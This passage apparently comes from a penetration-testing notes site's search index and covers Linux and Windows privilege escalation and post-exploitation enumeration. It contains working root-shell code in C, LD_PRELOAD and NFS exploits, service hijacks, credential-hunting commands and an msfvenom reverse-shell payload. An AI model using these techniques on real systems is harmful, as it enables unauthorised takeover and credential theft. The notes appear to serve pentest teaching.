You should also go through the bash history and look for any passwords which were passed as command-line arguments. You should then move on to looking for exploits. Kernel exploits are really low-hanging fruit, so you should always check the kernel version. Subsequently, proceed by enumerating sudo and the different ways to exploit it, for example via Shell Escape Sequences or LD_PRELOAD. Next, track down any misconfigurations such as excessive capabilities or SUID Binaries. You should check if you have write access to any sensitive files such as /etc/passwd or /etc/shadow, as well as any cron jobs or cron job dependencies. Ultimately, you should move on to enumerating running software and services which are executed as root and try to find vulnerabilities in them which may allow for privilege escalation. This can all be summed up as follows: Credentials Reused Credentials Credentials in Configuration or Source Files Credentials from Databases Credentials in Sensitive Files Credentials from Bash History SSH Keys Exploitation Kernel Exploits Sudo Misconfigurations Excessive Capabilities SUID/SGID Binaries Write Access to Sensitive Files Writable Cron Jobs and Cron Job Dependencies Installed Software Vulnerabilities in Software and Services Running as Root","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Methodology","id":"160","title":"Methodology"},"161":{"body":"The Set Owner User ID (SUID) and Set Group ID (SGID) are special permissions which can be attributed to Linux files and folders. Any files which are owned by root and have SUID set will be executed with elevated privileges. Our goal is to hunt down those files and abuse them in order to escalate our privileges. 
This can be easily done with the following command: find / -perm -u=s -type f -user root 2>/dev/null","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Introduction","id":"161","title":"Introduction"},"162":{"body":"You should diligently inspect the list of files returned. Some standard Linux binaries may allow for privilege escalation if they have the SUID bit set for one reason or another. It is useful to go through these binaries and check them on GTFOBins. In the above example, we find that /bin/systemctl has the SUID bit set and that it also has an entry in GTFOBins: By following the instructions, although with slight modifications, we can run commands with elevated privileges:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Exploiting Misconfigured Common Binaries","id":"162","title":"Exploiting Misconfigured Common Binaries"},"163":{"body":"Some binaries may be vulnerable to Shared Object (SO) Injection. This typically stems from misconfigurations where the binary looks for a specific library in a specific directory, but can't actually find it. If we have write access to this directory, we can hijack the search for the library by compiling our own malicious library in the place where the original one was supposed to be. This is quite similar to escalating via LD_PRELOAD, but it is a bit more difficult to find and exploit. You will first need to identify an SUID binary which has misconfigured shared libraries. A lot of the time the binary will refuse to run, saying that it is missing a particular library; however, this is not always the case: It is always good practice to run the programme with strace, which will print any attempts by the binary to access libraries: strace 2>&1 | grep -iE \"open|access\" What stands out in particular is the /home/user/.config/libcalc.so library, since /home/user/.config/ may be a writable directory. 
It turns out that the directory doesn't even exist; however, we can write to /home/user/, which means that we can create it. What now remains is to compile a malicious library into libcalc.so. #include \n#include static void inject() __attribute__((constructor)); void inject()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\");\n} For older versions of GCC, you may need to use the _init() function syntax: #include \n#include void _init()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\");\n} Compile the malicious library: gcc -shared -fPIC -o libcalc.so libcalc.c # add -nostartfiles if using _init()","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Privilege Escalation via Shared Object Injection","id":"163","title":"Privilege Escalation via Shared Object Injection"},"164":{"body":"Path Hijacking refers to the deliberate manipulation of environment variables, most commonly \\$PATH, such that the invocations of programmes in a binary actually refer to malicious binaries and not the intended ones. This vector requires more sophisticated digging into the internals of an SUID binary, specifically tracking down the different invocations the binary performs. This can commonly be achieved by running strings on the binary, but you will probably have to resort to more serious reverse engineering, as well. Specifically, you want to be on the lookout for shell commands which get executed by the SUID binary.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Privilege Escalation via Path Hijacking","id":"164","title":"Privilege Escalation via Path Hijacking"},"165":{"body":"Relative paths are comparably easy to hijack - they require little other than editing the \\$PATH variable. 
Once you have identified a shell command within an SUID binary which invokes another programme via a relative path, you can just prepend to \\$PATH a directory which will contain an executable with the same name as the one originally invoked. Let's compile our own malicious binary. #include \n#include int main()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\"); return 0;\n} gcc -o /tmp/service /tmp/service.c Afterwards, we need to prepend /tmp to the \\$PATH variable: export PATH=/tmp:\\$PATH And finally, run the original SUID binary:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Hijacking Relative Paths","id":"165","title":"Hijacking Relative Paths"},"166":{"body":"Absolute paths require a bit more work to be hijacked. Luckily, bash turns out to be very sophisticated and allows for the creation of functions which have the forward slash (/) character in their name. This means that we can create a malicious bash function with the same name as the absolute path we want to hijack and then our function will be invoked in lieu of the original programme. First, create the bash function: function () { cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p; } Next, export the function: export -f Finally, run the original SUID binary:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Hijacking Absolute Paths","id":"166","title":"Hijacking Absolute Paths"},"167":{"body":"The kernel is the layer which sits between applications and the hardware. It runs with root privileges, so if it gets exploited, privileges can be escalated. Finding kernel vulnerabilities and writing exploits for them is no trifling task; however, once such a vulnerability is made public and exploit code for it is developed, it easily becomes a low-hanging fruit for escalating privileges. A very useful list of kernel exploits found to date is located here. 
Finding already existing exploits is really easy - just search for the Linux kernel version!","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Kernel Exploits » Introduction","id":"167","title":"Introduction"},"168":{"body":"As an example, we are going to exploit dirtyc0w. This was a very ubiquitous exploit and can still be found on numerous outdated machines. The exploit itself has many versions but for demonstration purposes we are going to use the one at https://www.exploit-db.com/exploits/40839. We need to first verify that our kernel version is in the vulnerable range. Inside the exploit we see compilation instructions, which is typical of kernel exploits as they are usually written in C: By compiling and running the exploit (it may actually take some time to execute), we have elevated our privileges!","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Kernel Exploits » Exploiting the Kernel","id":"168","title":"Exploiting the Kernel"},"169":{"body":"It is common to see a low-privileged user configured to be able to run some commands via sudo without a password. Luckily, many existing programmes for Linux have advanced capabilities which allow them to do many things such as spawning a shell when run with sudo. If such a programme is configured in the aforementioned way, then there is a shell escape sequence which is a (usually) simple command/argument passed to the programme when run, so that it spawns a shell with elevated privileges when run with sudo. Naturally, these shell escape sequences are programme-specific and it would be inane to try and remember the sequence for every binary. This is where GTFOBins comes in. This is a database of commands (including shell escape sequences) for common Linux binaries which can be used for escalating privileges. We saw in the above list provided by sudo -l that we are allowed to run find as root via sudo. Let's check if there is a shell escape sequence for it. There is! 
We can copy and paste it, then run it with sudo, and we should at last have a root shell: Another example can be given with the awk binary, which we also saw in the list provided by sudo -l.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Shell Escape Sequences » Introduction","id":"169","title":"Introduction"},"17":{"body":"All services which need to interface with the network a host is connected to run on ports, and port scanning allows us to enumerate them in order to gather information such as what service is running, which version of the service is running, OS information, etc. Warning Port scanning is very heavy on network bandwidth and generates a lot of traffic which can cause the target to slow down or crash altogether. During a penetration test, you should always inform the client when you are about to perform a port scan. Danger Port scanning without prior written permission from the target may be considered illegal in some jurisdictions. The de-facto standard port scanner is nmap, although alternatives such as masscan and RustScan do exist. Info A lot of nmap's techniques require elevated privileges, so it is advisable to always run the tool with sudo.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » Introduction","id":"17","title":"Introduction"},"170":{"body":"The compromised machine may be configured to allow certain directories to be mounted by other machines. You can enumerate such directories by running the following command on the victim machine: cat /etc/exports You can additionally verify this from your attacker machine by running: showmount -e If there is a mountable directory which is configured as no_root_squash, as is the case here, then it can be used for privilege escalation. 
We begin by mounting the target directory from the victim to a directory on our machine: sudo mount -o rw,vers=3 :/tmp /tmp/root_squash Now, if no_root_squash is configured for the mountable directory, then the root user on the attacker machine will get mirrored on the victim machine. In essence, any command run as root on the attacker machine will also be executed as root on the victim! This can allow us to create a malicious binary in the mounted directory and set its SUID bit from the attacker machine. This action will be mirrored by the victim and we will essentially have an SUID binary on the target which is all under our control. Let's write a simple malicious C executable: #include \n#include int main()\n{ setuid(0); // Set user ID to root setgid(0); // Set group ID to root system(\"/bin/bash -i\"); // Execute bash now with elevated privileges return 0;\n} It doesn't matter if you create it on the target or the attacker machine, but you must compile it on the target machine in order to avoid library version mismatches: gcc -o nfs_exploit nfs_exploit.c Next, you want to change the ownership of the compiled binary to root on the attacker machine. Afterwards, you want to set the SUID bit on the binary, once again, from the attacker machine: sudo chown root:root nfs_exploit\nsudo chmod +s nfs_exploit Finally, execute the malicious binary on the target:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » NFS Root Squashing » Introduction","id":"170","title":"Introduction"},"171":{"body":"Linux capabilities provide a way for splitting permissions into small units. A binary with particular capabilities can perform certain tasks with elevated privileges. If capabilities are not properly set, or if they are excessive, this may lead to privilege escalation. Binaries with capabilities may be found using the following command: getcap / -r 2>/dev/null A list of all possible capabilities can be found here. 
In the above example, we can see that the python interpreter can arbitrarily set the user ID of the process. This means that we can change our user ID to 0 when running python, thus escalating our privileges:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing Linux Capabilities » Introduction","id":"171","title":"Introduction"},"172":{"body":"The LD_PRELOAD environment variable can be used to tell the dynamic linker to load specific libraries before any others. By default, programmes run with sudo will be executed in a clean, minimal environment which is specified by env_reset when running sudo -l. However, env_keep may be used to inherit some environment variables from the parent process. If LD_PRELOAD is specified together with env_keep, then we can compile our own malicious dynamic library and set LD_PRELOAD to it. Therefore, when we execute a binary with sudo, our library will be loaded before any other library and its initialisation function will be invoked with root permissions.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Escalation via LD_PRELOAD » Introduction","id":"172","title":"Introduction"},"173":{"body":"Writing the library is a fairly simple task. All we need to do is write an _init function in a C file. This procedure will contain the code we want to be executed when the library is loaded. #include \n#include \n#include void _init()\n{ unsetenv(\"LD_PRELOAD\"); // Unset LD_PRELOAD to avoid an infinite loop setgid(0); // Set root permissions setuid(0); // Set root permissions system(\"/bin/bash\");\n} We begin by unsetting the LD_PRELOAD variable from the environment. This is to preclude an infinite loop when /bin/bash is invoked. If our library didn't unset LD_PRELOAD, then when /bin/bash is called, our library will again be loaded first and then proceed onto launching /bin/bash yet again, which will again load our library and so on. 
The next two lines set the user and group IDs to those of root, which ensures that the next commands are run with root privileges. Finally, system is called in order to spawn a bash shell. We now need to compile this file as a shared library: gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles At last, we can invoke any binary with sudo and specify the path to our library as LD_PRELOAD. Note that the path to the library must be specified as an absolute path.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Escalation via LD_PRELOAD » Writing the Malicious Library","id":"173","title":"Writing the Malicious Library"},"174":{"body":"Once you have gained access to a system, it is paramount to look for other credentials which may be located on the system. These may be hidden in the Windows Registry, within log or configuration files, and more. Moreover, you should check to see if any credentials you have previously found work with anything else. You should also check if you have access to the Windows SYSTEM or SAM files or any of their backups, since those will contain the hashes for users on the system. If so, you might be able to perform a pass-the-hash attack or simply crack them. If the compromised system is a Windows Server, you should look for any stored credentials which can be used with RunAs. You should check the Windows build and version and see if there are any kernel exploits available. You should then move on to enumerating misconfigurations in services and other Windows-specific vectors. If none of these bear any fruit, you should look at the programmes installed on the system, enumerate them for misconfigurations, explore their versions and any exploits which may be available. If none are found, you might consider reverse engineering and binary exploitation as a last resort. Finally, if you have gained access as a local administrator, you should proceed to looking for ways to bypass UAC. 
In essence: Credentials Reused Credentials Credentials in Configuration or Log files Credentials in the Windows Registry Credentials from Windows SAM and SYSTEM files Pass-the-hash attacks Stored Credentials (Windows Servers) Kernel Exploits Misconfigurations Services AutoRuns Startup Applications Scheduled Tasks AlwaysInstallElevated Group Policy Bypassing UAC","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Methodology","id":"174","title":"Methodology"},"175":{"body":"Windows Services allow for the creation of continuously running executable applications. These applications have the ability to be automatically started upon booting, they may be paused and restarted, and they lack a user interface. In order for a service to function properly, it needs to be associated with a system or user account. There are a few common built-in system accounts that are used to operate services such as LocalService, NetworkService, and LocalSystem. The following table describes the default secure access rights for accounts on a Windows system: Account Permissions Local Authenticated Users (including LocalService and Network Service) READ_CONTROL SERVICE_ENUMERATE_DEPENDENTS SERVICE_INTERROGATE SERVICE_QUERY_CONFIG SERVICE_QUERY_STATUS SERVICE_USER_DEFINED_CONTROL Remote Authenticated Users Same as those for Local Authenticated Users. 
LocalSystem READ_CONTROL SERVICE_ENUMERATE_DEPENDENTS SERVICE_INTERROGATE SERVICE_PAUSE_CONTINUE SERVICE_QUERY_CONFIG SERVICE_QUERY_STATUS SERVICE_START SERVICE_STOP SERVICE_USER_DEFINED_CONTROL Administrators DELETE READ_CONTROL SERVICE_ALL_ACCESS WRITE_DAC WRITE_OWNER Moreover, a registry entry exists for each service in HKLM\\SYSTEM\\CurrentControlSet\\Services.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Introduction","id":"175","title":"Introduction"},"176":{"body":"In general, manual enumeration of Windows services is a rather cumbersome process, so I suggest that you use a tool for automation such as WinPEAS. winpeas.exe servicesinfo The permissions a user has on a specific service can be inspected via the AccessChk Windows Utility. accesschk.exe /accepteula -uwcqv ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Enumeration","id":"176","title":"Enumeration"},"177":{"body":"This is a vulnerability which can be used to force a misconfigured service to execute an arbitrary programme in lieu of its intended one, as long as the path to that executable contains spaces. On its own, this does not allow for privilege escalation, but it becomes a really powerful tool when the misconfigured service is set to run with system privileges. Let's take a look at the following path: C:\\Program Files\\Vulnerable Service\\service.exe If this path were specified to the service in quotation marks, \"C:\\Program Files\\Vulnerable Service\\service.exe\", then Windows would treat it correctly, executing the service.exe file in the C:\\Program Files\\Vulnerable Service directory. However, Windows is not the sharpest tool in the box and if the path is provided without quotation marks, then it will see ambiguity in what it is supposed to execute. 
The path will be split at each space character - the first segment will be treated as the executable's name and the rest will be seen as command-line arguments to be passed to it. So at first, Windows will try to execute the following: C:\\Program.exe Files\\Vulnerable Service\\service.exe Once Windows determines that the C:\\Program.exe file does not exist, it will look for the next space character, treat the characters up to it as the new path and try to execute it again: C:\\Program Files\\Vulnerable.exe Service\\service.exe This process repeats until a file is successfully executed or the end of the path has been reached. If we are able to create a malicious executable in any of the possible paths that Windows will traverse, then we can hijack the service before the intended file is found. Once you have identified a vulnerable service, you can query it to confirm that the path is indeed unquoted. Let's check our access to the possible directories that will be probed by Windows: accesschk.exe /accepteula -uwdq While we cannot write within the C:\\ or C:\\Program Files directories (meaning that we cannot create C:\\Program.exe or C:\\Program Files\\Unquoted.exe), we do have write access to C:\\Program Files\\Unquoted Path Service\\. What this entails is our ability to create a Common.exe binary inside this directory and, since the initial path was unquoted, the path C:\\Program Files\\Unquoted Path Service\\Common.exe will be probed before C:\\Program Files\\Unquoted Path Service\\Common Files\\unquotedpathservice.exe and once Windows finds our malicious executable there, it will be executed with the service's permissions. 
If we couldn't restart the service, then we could have simply waited for something else to execute it.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Unquoted Service Paths » Unquoted Service Paths","id":"177","title":"Unquoted Service Paths"},"178":{"body":"As previously mentioned, each service is associated with a registry entry in the Windows Registry which is located at HKLM\\SYSTEM\\CurrentControlSet\\Services\\. This entry is essentially the configuration of the service and if it is writable, then it can be abused by an adversary to overwrite the path to the binary application of the service with a malicious one. Querying regsvc reveals that it is running with system privileges and its registry entry is writable by all logged-on users (NT AUTHORITY\\INTERACTIVE). All we need to do now is overwrite the ImagePath registry value in the service's entry to point to our malicious executable: reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\ /v ImagePath /t REG_EXPAND_SZ /d /f Restart the service and catch the shell: net start regsvc","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Weak Registry Permissions » Weak Registry Permissions","id":"178","title":"Weak Registry Permissions"},"179":{"body":"This is a technique which leverages misconfigurations in the service permissions for a specific user. If permissions for a specific user differ from the ones described in the table here, then they may manifest as a possible vulnerability. To identify such services, it is useful to use WinPEAS. It appears that our user has write access to the service daclsvc and can also start the service. We can query the service to see what user account is actually executing it: sc qc It appears that the service is running as LocalSystem, which is an account with more privileges than our user account. 
If we can write to the service, then we can alter its configuration and change the path to the executable which is supposed to be run: sc config binpath=\"\\\"\\\"\" All we now need to do is set up a listener and run the service: net start And we get a system shell back:","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Insecure Service Permissions » Insecure Service Permissions","id":"179","title":"Insecure Service Permissions"},"18":{"body":"There are two types of ports depending on the transport-layer protocol that they support. Both TCP and UDP ports range from 0 to 65535 but they are completely separate. For example, DNS uses UDP port 53 for queries but it uses TCP port 53 for zone transfers. To scan UDP ports, nmap requires elevated privileges and the -sU flag. nmap -sU Note Due to the nature of the protocol, UDP scanning takes a lot longer than TCP does.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » TCP vs UDP","id":"18","title":"TCP vs UDP"},"180":{"body":"The binary application executed by a service is considered insecure when an adversary has write access to it when they shouldn't. This means that an attacker can simply replace the file with a malicious executable. If the service is configured to run with system privileges, then those privileges will be inherited by the attacker's executable! All we need to do is simply replace the legitimate executable with a malicious one and then start the service.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Insecure Service Executable Permissions » Introduction","id":"180","title":"Introduction"},"181":{"body":"AutoRun applications are programmes which have been set up to automatically execute when a user logs in for the first time after booting the system. This is typically done so that the application can look for updates and update itself if necessary. 
For example, Steam, Spotify, and Discord all set this up upon installation. On its own, this does not pose a security risk. Where the real vulnerability lies is within AutoRuns which are writable by anyone. AutoRuns can be enumerated by querying the registry: reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Now all we need to do is generate the malicious executable and replace the AutoRun programme with it. Note that in order for the exploit to work, an administrator would need to log in. Now, as soon as the administrator logs in, we will get an elevated shell.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » AutoRun Programmes » Introduction","id":"181","title":"Introduction"},"182":{"body":"Windows has a group policy which, when enabled, allows a user to install a Microsoft Windows Installer Package (.msi file) with elevated privileges. This poses a security risk because an adversary can simply generate a malicious .msi file and execute it with admin privileges. In order to check for this vulnerability, one need only query the following registry values: reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\nreg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated The AlwaysInstallElevated policy appears enabled, so we can generate a malicious .msi executable. One way to do this is through Metasploit: msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f msi -o reverse.msi Next, transfer the executable to the target machine and execute it with msiexec: msiexec /quiet /qn /i ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » AlwaysInstallElevated Group Policy » Introduction","id":"182","title":"Introduction"},"183":{"body":"Kernel exploits are one of the most trivial privilege escalation paths available. 
One of the first things you should do when seeking a privilege escalation vector is to look at the kernel version as well as any installed patches and determine if it is vulnerable to a known kernel exploit. Plenty of exploits can be found just by searching for the kernel version, but a cheat sheet which I like can be found here. Naturally, the use of a kernel exploit is highly specific on a case-by-case basis. Once you have identified that the system is vulnerable to a known kernel exploit, you will need to find the exploit code.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Kernel Exploits » Introduction","id":"183","title":"Introduction"},"184":{"body":"Windows Scheduled Tasks allow for the periodic execution of scripts. These can be manually enumerated via the following command: schtasks /query /fo LIST /v A scheduled task is of interest when it is executed with elevated privileges but we have write access to the script it executes. This script is fairly simple, so we can just append a line to it which executes a malicious executable. When the time for the scheduled task comes, we will catch an elevated shell.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Scheduled Tasks » Introduction","id":"184","title":"Introduction"},"185":{"body":"User Account Control (UAC) is a security measure introduced in Windows Vista which aims to prevent unauthorised changes to the operating system. It ensures that any such changes require the assent of the administrator or a user who is part of the local administrators group. Administrative privileges in Windows are a bit different from those in Linux. Even if an adversary manages to execute some code from an administrator account, this code will not run with elevated privileges, unless it was \"run as Administrator\"-ed. When an unprivileged user attempts to run a programme as administrator, they will be prompted by UAC to enter the administrator's password. 
However, if the user is privileged (they are an administrator), they will still be prompted with the same UAC prompt, but it will ask them for consent in lieu of a password. Essentially, an administrative user will need to click \"Yes\" instead of typing their password. What is described so far is the default behaviour. UAC, however, has different protection levels which can be configured. There are 3 options (two of the options are the same but with different aesthetics). The first option, and the most strict, is Always Notify. If UAC is set to this, then any programme which tries to run with elevated privileges will beget a UAC prompt - including Windows built-in ones. Next is the default setting - Notify me when applications try to make changes to my computer. Under this configuration, regular applications will still cause a UAC prompt to show up whenever run as administrator; however, Windows built-in programmes can be run with elevated privileges without such a prompt. Next is another option which is the exact same as this one, but the UAC prompt will not dim the screen. This is useful for computers for which dimming the screen is not exactly a trifling task. Finally, Never Notify means that a UAC prompt will never be spawned no matter who is trying to run the application with elevated privileges. UAC can be bypassed if an adversary already has access to a user account which is part of the local administrators group and UAC is configured to the default setting.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Bypassing UAC » Introduction","id":"185","title":"Introduction"},"186":{"body":"There are many tools for bypassing UAC and which one is to be used depends on the Windows build and version. One such tool which has lots of methods for bypassing UAC is UACMe. 
You will need to build it from source using Visual Studio, meaning that you will need a Windows machine in order to compile it.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Bypassing UAC » Bypassing UAC","id":"186","title":"Bypassing UAC"},"187":{"body":"Windows Startup applications are very similar to AutoRun Programmes; however, they are executed every time a user logs in. If we can write to the Startups directory, then we can place a malicious executable there which will be executed upon the next login. If the next user to log in is an administrator, then we will gain elevated privileges. To check for write access to the Startups directory, we can use accesschk: C:\\PrivEsc\\accesschk.exe /accepteula -d \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\" All we need to do is place a malicious executable in the directory and wait for an admin to log in.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Startup Applications » Introduction","id":"187","title":"Introduction"},"188":{"body":"Windows Servers can store credentials using a built-in utility called cmdkey. On its own, cmdkey is rather useless to an adversary - you can only really use it to list what credentials are stored but not actually reveal them. cmdkey /list The real deal is another built-in utility called Runas. It allows one user to execute a binary with the permissions of another and, what is essential here, this can be achieved with only stored credentials. One doesn't even need to know what the credentials are - so long as a user has their credentials stored, then they can be used to execute programmes as that user. runas /savedcred /user: ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Stored Credentials » Introduction","id":"188","title":"Introduction"},"189":{"body":"Windows Access Tokens are objects which describe the security context in which a thread or process is run. 
The information within an access token identifies the user and the privileges of said process or thread. Upon each successful user log-on, an access token for the user is generated and every process executed by this user will contain a copy of this token called the primary token. This token is used by the system to inspect the privileges of the process when the process tries to interact with something which may require certain privileges. However, threads of the process are allowed to use a second token, called an impersonation token, to interact with objects as if they had a different security context and different privileges. This is only allowed when the process has the SeImpersonatePrivilege. As with UAC bypassing, exploiting token impersonation is highly dependent on the Windows build and version. However, the most infamous exploits are the Potato exploits.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Token Impersonation » Introduction","id":"189","title":"Introduction"},"19":{"body":"When scanning, nmap will determine that a port is in one of the following states: open - an application is actively listening for TCP connections, UDP datagrams or SCTP associations on this port closed - the port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it filtered - Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. Usually, the filter sends no response, so Nmap needs to resend the probe a few times in order to be sure that it wasn't dropped due to traffic congestion. This slows the scan drastically unfiltered - the port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, used for mapping firewall rulesets, may put ports in this state open|filtered - Nmap is unable to determine whether the port is open or filtered. 
This occurs for scan types in which open ports give no response closed|filtered - Nmap is unable to determine whether the port is closed or filtered. It is only used for the IP ID idle scan. By default, nmap scans only the 1000 most common TCP ports. One can scan specific ports by listing them separated by commas directly after the -p flag. nmap -pport1,port2,... If no ports are specified after the -p flag, nmap will scan all ports (either UDP or TCP depending on the type of scan). nmap -p ","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » Port States","id":"19","title":"Port States"},"190":{"body":"","breadcrumbs":"Post Exploitation » Enumeration","id":"190","title":"Post Exploitation"},"191":{"body":"There are plenty of tools which can be used for automating post-exploitation enumeration on Linux machines.","breadcrumbs":"Post Exploitation » Enumeration » Linux » Introduction","id":"191","title":"Introduction"},"192":{"body":"LinPEAS is an amazing tool for automation enumeration. It is written in Bash which means that it requires no additional dependencies and can be freely run. In order to acquire the latest version of LinPEAS, run the following command: wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh By default, running LinPEAS will perform many checks on the system and spit out a deluge of information. However, the tool can also be used to only perform specific tasks using the -o argument. 
Enumerate system information: ./linpeas.sh -o system_information Enumerate containers on the machine: ./linpeas.sh -o container Enumerate cloud platforms: ./linpeas.sh -o cloud Enumerate available software: ./linpeas.sh -o software_information Enumerate processes, cronjobs, services, and sockets: ./linpeas.sh -o procs_crons_timers_srvcs_sockets Enumerate network information: ./linpeas.sh -o network_information Enumerate user information: ./linpeas.sh -o users_information Enumerate interesting files: ./linpeas.sh -o interesting_files","breadcrumbs":"Post Exploitation » Enumeration » Linux » Linux Enumeration with LinPEAS","id":"192","title":"Linux Enumeration with LinPEAS"},"193":{"body":"Find all files in a directory which contain \"pass\" or \"password\", ignoring case: grep --color=auto -rnw '' -ie \"password\\|pass\" --color=always 2>/dev/null Find all files in a directory which contain \"pass\" or \"password\" in their name, ignoring case: find / -name \"*pass*\" 2>/dev/null","breadcrumbs":"Post Exploitation » Enumeration » Linux » Hunting Down Sensitive Files » Finding Files Containing Passwords","id":"193","title":"Finding Files Containing Passwords"},"194":{"body":"find / -name id_rsa 2>/dev/null","breadcrumbs":"Post Exploitation » Enumeration » Linux » Hunting Down Sensitive Files » Finding SSH Keys","id":"194","title":"Finding SSH Keys"},"195":{"body":"System enumeration is a crucial, typically first, step in the enumeration phase of post-exploitation.","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Introduction","id":"195","title":"Introduction"},"196":{"body":"cat /etc/issue","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating the Distribution Version","id":"196","title":"Enumerating the Distribution Version"},"197":{"body":"uname -a cat /proc/version","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating Linux Kernel Version 
Information","id":"197","title":"Enumerating Linux Kernel Version Information"},"198":{"body":"lscpu","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating CPU Architecture","id":"198","title":"Enumerating CPU Architecture"},"199":{"body":"ps aux","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating Running Services","id":"199","title":"Enumerating Running Services"},"2":{"body":"You should only make changes inside the eight category folders under the Notes/ directory. Minor edits to already existing content outside of the aforementioned allowed directories are permitted as long as they do not bring any semantic change - for example fixing typos.","breadcrumbs":"Cyberclopaedia » Contributing » In-Scope","id":"2","title":"In-Scope"},"20":{"body":"This is the type of scan which nmap defaults to when run with elevated privileges and is also referred to as a \"stealth scan\". Nmap sends a SYN packet to the target, initiating a TCP connection. The target responds with SYN ACK, telling Nmap that the port is accessible. Finally, Nmap terminates the connection before it's finished by issuing an RST packet. This type of scan can also be specified using the -sS option. 
Note Despite its moniker, a SYN scan is no longer considered \"stealthy\" and is quite easily detected nowadays.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » SYN Scan » SYN Scan","id":"20","title":"SYN Scan"},"200":{"body":"List files owned by a certain user in a directory: find -user 2>/dev/null List files owned by a certain user in a directory (without /proc): find -user 2>/dev/null | grep -v \"/proc\" List files owned by a certain group in a directory: find -group 2>/dev/null find -group 2>/dev/null | grep -v \"/proc\" # ignore /proc","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » File System Enumeration","id":"200","title":"File System Enumeration"},"201":{"body":"whoami id","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Enumerate User Name and Group","id":"201","title":"Enumerate User Name and Group"},"202":{"body":"sudo -l","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Enumerate Commands Runnable as Root","id":"202","title":"Enumerate Commands Runnable as Root"},"203":{"body":"cat /etc/passwd","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » List Users on the Machine","id":"203","title":"List Users on the Machine"},"204":{"body":"history","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Get History of Commands the User Has Run","id":"204","title":"Get History of Commands the User Has Run"},"205":{"body":"Get a list of the network interfaces connected to the machine with their IPs and MACs: ip a Get a list of the machines that the victim has been interacting with (print the ARP table): ip neigh","breadcrumbs":"Post Exploitation » Enumeration » Linux » Network Enumeration » List Network Interfaces and Network Information","id":"205","title":"List Network Interfaces and Network Information"},"206":{"body":"netstat -ano","breadcrumbs":"Post Exploitation » Enumeration » Linux » Network Enumeration » List 
